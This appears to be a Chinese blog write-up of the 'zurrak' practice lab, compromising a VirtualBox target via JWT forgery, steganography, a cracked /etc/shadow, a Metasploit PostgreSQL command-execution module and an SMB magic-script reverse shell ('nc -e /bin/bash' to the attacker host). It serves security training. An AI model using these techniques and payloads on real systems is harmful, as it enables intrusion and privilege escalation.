难度:medium
kali:192.168.56.104
靶机:192.168.56.140
端口扫描
# nmap -sV -A 192.168.56.140
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-03-30 16:59 CST
Nmap scan report for 192.168.56.140
Host is up (0.00039s latency).
Not shown: 996 closed tcp ports (reset)
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.57 ((Debian))
|_http-server-header: Apache/2.4.57 (Debian)
| http-title: Login Page
|_Requested resource was login.php
139/tcp open netbios-ssn Samba smbd 4.6.2
445/tcp open netbios-ssn Samba smbd 4.6.2
5432/tcp open postgresql PostgreSQL DB 9.6.0 or later
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=zurrak
| Subject Alternative Name: DNS:zurrak
| Not valid before: 2023-10-20T19:29:16
|_Not valid after: 2033-10-17T19:29:16
| fingerprint-strings:
| SMBProgNeg:
| SFATAL
| VFATAL
| C0A000
| Munsupported frontend protocol 65363.19778: server supports 3.0 to 3.0
| Fpostmaster.c
| L2195
|_ RProcessStartupPacket
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port5432-TCP:V=7.94SVN%I=7%D=3/30%Time=6607D461%P=x86_64-pc-linux-gnu%r
SF:(SMBProgNeg,8C,"E\0\0\0\x8bSFATAL\0VFATAL\0C0A000\0Munsupported\x20fron
SF:tend\x20protocol\x2065363\.19778:\x20server\x20supports\x203\.0\x20to\x
SF:203\.0\0Fpostmaster\.c\0L2195\0RProcessStartupPacket\0\0");
MAC Address: 08:00:27:62:31:5D (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
Network Distance: 1 hop
Host script results:
| smb2-time:
| date: 2024-03-30T16:59:18
|_ start_date: N/A
|_clock-skew: 7h59m58s
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled but not required
TRACEROUTE
HOP RTT ADDRESS
1 0.39 ms 192.168.56.140
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 19.05 seconds
开启了 80 139 445 5432 四个端口没有22
先smb枚举一下
# enum4linux 192.168.56.140
Starting enum4linux v0.9.1 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Sat Mar 30 17:03:12 2024
=========================================( Target Information )=========================================
Target ........... 192.168.56.140
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none
===========================( Enumerating Workgroup/Domain on 192.168.56.140 )===========================
[E] Can't find workgroup/domain
===============================( Nbtstat Information for 192.168.56.140 )===============================
Looking up status of 192.168.56.140
No reply from 192.168.56.140
==================================( Session Check on 192.168.56.140 )==================================
[E] Server doesn't allow session using username '', password ''. Aborting remainder of tests.
无果
浅扫一下目录
# gobuster dir -u http://192.168.56.140 -x html,txt,php,bak,zip --wordlist=/usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.56.140
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Extensions: html,txt,php,bak,zip
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.php (Status: 403) [Size: 279]
/index.php (Status: 302) [Size: 1270] [--> login.php]
/.html (Status: 403) [Size: 279]
/login.php (Status: 200) [Size: 2041]
/admin.php (Status: 302) [Size: 2625] [--> login.php]
/vendor (Status: 301) [Size: 317] [--> http://192.168.56.140/vendor/]
/index_.php (Status: 200) [Size: 200]
/.php (Status: 403) [Size: 279]
/.html (Status: 403) [Size: 279]
Progress: 346965 / 1323366 (26.22%)^C
[!] Keyboard interrupt detected, terminating.
Progress: 347585 / 1323366 (26.27%)
===============================================================
Finished
===============================================================
可以看到有login admin index_ 几个文件 估计是要登录
去web看一下
一个朴素的登录界面,源码里给了账号密码
username:internal@zurrak.htb && password:testsite
登录上一片空白,看源码
自动跳转回index.php
想起目录扫描出来一个index_.php去看
乍一看以为base64其实是jwt
暂时不知道有什么用
回到index.php,抓包发现cookie里面有token也是一个jwt,解析一下
这次不一样了,多一个isAdmin参数
那就爆破jwt,用jwt_tools
爆破出来key是TEST123
然后伪造jwt
利用这个token去admin.php
please don't ever use these images for file transfers!!!把隐写提示甩脸上了
在第三个图片隐写了一个exe文件
# stegseek zurrakhearts.jpg
StegSeek 0.6 - https://github.com/RickdeJager/StegSeek
[i] Found passphrase: ""
[i] Original filename: "asli.exe".
[i] Extracting to "zurrakhearts.jpg.out".
放到ida64反编译
转化成字符串发现是ilovecats
有密码了,但是没有用户名,猜测是exe文件名asli
尝试smb连接
┌──(root㉿kali2)-[~/Desktop]
└─# smbclient //192.168.56.140/share -U asli --password ilovecats
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Sat Oct 21 05:14:00 2023
.. D 0 Sat Oct 21 04:36:51 2023
DONTDELETE D 0 Sat Oct 21 11:44:44 2023
operations D 0 Sat Oct 21 12:04:30 2023
backup.reg N 1792 Sun Jul 24 13:30:09 2011
human_resources D 0 Sun Apr 2 13:30:09 2017
launch_options.txt N 21 Wed Dec 14 11:55:16 2022
9232860 blocks of size 1024. 6208916 blocks available
连接成功(后面我都不会,看着wp做的,也记录一下)
从\operations\New folder\deploy\3\latest\approved 目录下载zurrak.old.vmdk
从\operations 跳转到New folder可以用cd "New folder",不然有空格挂载不了
┌──(root㉿kali2)-[~/Desktop]
└─# qemu-system-x86_64 -hda zurrak.old.vmdk -display gtk,show-cursor=on
挂在一个这个虚拟镜像
输入c进入grub模式
输入 cat (hd0,1)/etc/shadow可以看到root和postgres的密码
md我不知道该如何下载到我的kali上,这里先不说,继续
将root和postgres用john爆破
得到postgres数据库的密码是baller15
然后用msf的exp
msf6 exploit(multi/postgres/postgres_copy_from_program_cmd_exec) > options
Module options (exploit/multi/postgres/postgres_copy_from_program_cmd_exec):
Name Current Setting Required Description
---- --------------- -------- -----------
DATABASE template1 yes The database to authenticate against
DUMP_TABLE_OUTPUT false no select payload command output from t
able (For Debugging)
PASSWORD baller15 no The password for the specified usern
ame. Leave blank for a random passwo
rd.
RHOSTS 192.168.56.140 yes The target host(s), see https://docs
.metasploit.com/docs/using-metasploi
t/basics/using-metasploit.html
RPORT 5432 yes The target port (TCP)
TABLENAME BTgo9XNkX6n yes A table name that does not exist (To
avoid deletion)
USERNAME postgres yes The username to authenticate as
Payload options (cmd/unix/reverse_perl):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 192.168.56.104 yes The listen address (an interface may be specifie
d)
LPORT 4567 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic
View the full module info with the info, or info -d command.
msf6 exploit(multi/postgres/postgres_copy_from_program_cmd_exec) > run
[-] Handler failed to bind to 192.168.56.104:4567:- -
[-] Handler failed to bind to 0.0.0.0:4567:- -
[-] 192.168.56.140:5432 - Exploit failed [bad-config]: Rex::BindFailed The address is already in use or unavailable: (0.0.0.0:4567).
[*] Exploit completed, but no session was created.
msf6 exploit(multi/postgres/postgres_copy_from_program_cmd_exec) > run
[*] Started reverse TCP handler on 192.168.56.104:4567
[*] 192.168.56.140:5432 - 192.168.56.140:5432 - PostgreSQL 15.3 (Debian 15.3-0+deb12u1) on x86_64-pc-linux-gnu, compiled by gcc (Debian 12.2.0-14) 12.2.0, 64-bit
[*] 192.168.56.140:5432 - Exploiting...
[+] 192.168.56.140:5432 - 192.168.56.140:5432 - BTgo9XNkX6n dropped successfully
[+] 192.168.56.140:5432 - 192.168.56.140:5432 - BTgo9XNkX6n created successfully
[+] 192.168.56.140:5432 - 192.168.56.140:5432 - BTgo9XNkX6n copied successfully(valid syntax/command)
[+] 192.168.56.140:5432 - 192.168.56.140:5432 - BTgo9XNkX6n dropped successfully(Cleaned)
[*] 192.168.56.140:5432 - Exploit Succeeded
[*] Command shell session 1 opened (192.168.56.104:4567 -> 192.168.56.140:54666) at 2024-03-30 18:58:11 +0800
配置一下password lhost lport rhost然后run就能拿到shell
我习惯反弹到kali上
postgres@zurrak:/var/lib/postgresql/15/main$ whoami
postgres
postgres@zurrak:/var/lib/postgresql/15/main$ ls
base pg_multixact pg_stat PG_VERSION postmaster.pid
global pg_notify pg_stat_tmp pg_wal
pg_commit_ts pg_replslot pg_subtrans pg_xact
pg_dynshmem pg_serial pg_tblspc postgresql.auto.conf
pg_logical pg_snapshots pg_twophase postmaster.opts
postgres@zurrak:/var/lib/postgresql/15/main$ cd /home
postgres@zurrak:/home$ ls -al
total 12
drwxr-xr-x 3 root root 4096 Oct 20 19:06 .
drwxr-xr-x 18 root root 4096 Oct 20 15:22 ..
drwxr-xr-x 2 postgres postgres 4096 Oct 24 18:03 postgres
postgres@zurrak:/home$ cd postgres
postgres@zurrak:/home/postgres$ ;s
bash: syntax error near unexpected token `;'
postgres@zurrak:/home/postgres$ ls
emergency.sh user.txt
postgres@zurrak:/home/postgres$ cat user.txt
fe8f97f109ceb0362c95e60338c4c1a8
postgres@zurrak:/home/postgres$
很不容易地拿到了user flag
还有一个emergency.sh文件
然后传linpeas跑一下
postgres@zurrak:/home/postgres$ wget http://192.168.56.104:6677/linpeas.sh
--2024-03-30 15:04:13-- http://192.168.56.104:6677/linpeas.sh
Connecting to 192.168.56.104:6677... connected.
HTTP request sent, awaiting response... 200 OK
Length: 828172 (809K) [text/x-sh]
Saving to: ‘linpeas.sh’
linpeas.sh 100%[===================>] 808.76K --.-KB/s in 0.02s
2024-03-30 15:04:13 (51.9 MB/s) - ‘linpeas.sh’ saved [828172/828172]
postgres@zurrak:/home/postgres$ ls
emergency.sh linpeas.sh user.txt
postgres@zurrak:/home/postgres$ chmod +x linpeas.sh
postgres@zurrak:/home/postgres$ ./linpeas.sh
╔══════════╣ Unmounted file-system?
╚ Check if you can mount umounted devices
UUID=86e74abe-2367-4664-8041-b897fb803a6d / ext4 errors=remount-ro 0 1
UUID=68b2a8a8-27f9-4255-9e14-180abd1261c4 none swap sw 0 0
/dev/sr0 /media/cdrom0 udf,iso9660 user,noauto 0 0
//127.0.0.1/internal uid=emre, pw=daily666
发现一个本地smb
看一下smb配置文件
#cat /etc/samba/smb.conf
...
[ipc$]
hosts allow = 127.0.0.1
hosts deny = 0.0.0.0/0
guest ok = no
browseable = no
[share]
comment = "zurrak operations share"
path = /opt/smbshare
hosts allow = 0.0.0.0/0
guest ok = no
browseable = yes
writable = no
valid users = emre, asli
[internal]
comment = "zurrak internal share"
path = /opt/internal
hosts allow = 127.0.0.1
guest ok = no
browseable = yes
writable = yes
valid users = emre
create mask = 0777
directory mask = 0777
force user = root
magic script = emergency.sh
127.0.0.1的smb会执行emergency.sh脚本,那么我们劫持一下然后反弹shell
postgres@zurrak:/home/postgres$ cat emergency.sh
#!/bin/bash
nc -e /bin/bash 192.168.56.104 4444
#smbclient \\\\127.0.0.1/internal -U emre%daily666 -c "put emergency.sh"
# nc -lvnp 4444
listening on [any] 4444 ...
connect to [192.168.56.104] from (UNKNOWN) [192.168.56.140] 40948
id
uid=0(root) gid=0(root) groups=0(root)
cd /root
ls
bash_history
root.txt
cat root.txt
66fce7650a88ac2afd99d061e1c6a4df
照葫芦画瓢也是拿到了root权限。medium,哎我太菜了。
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
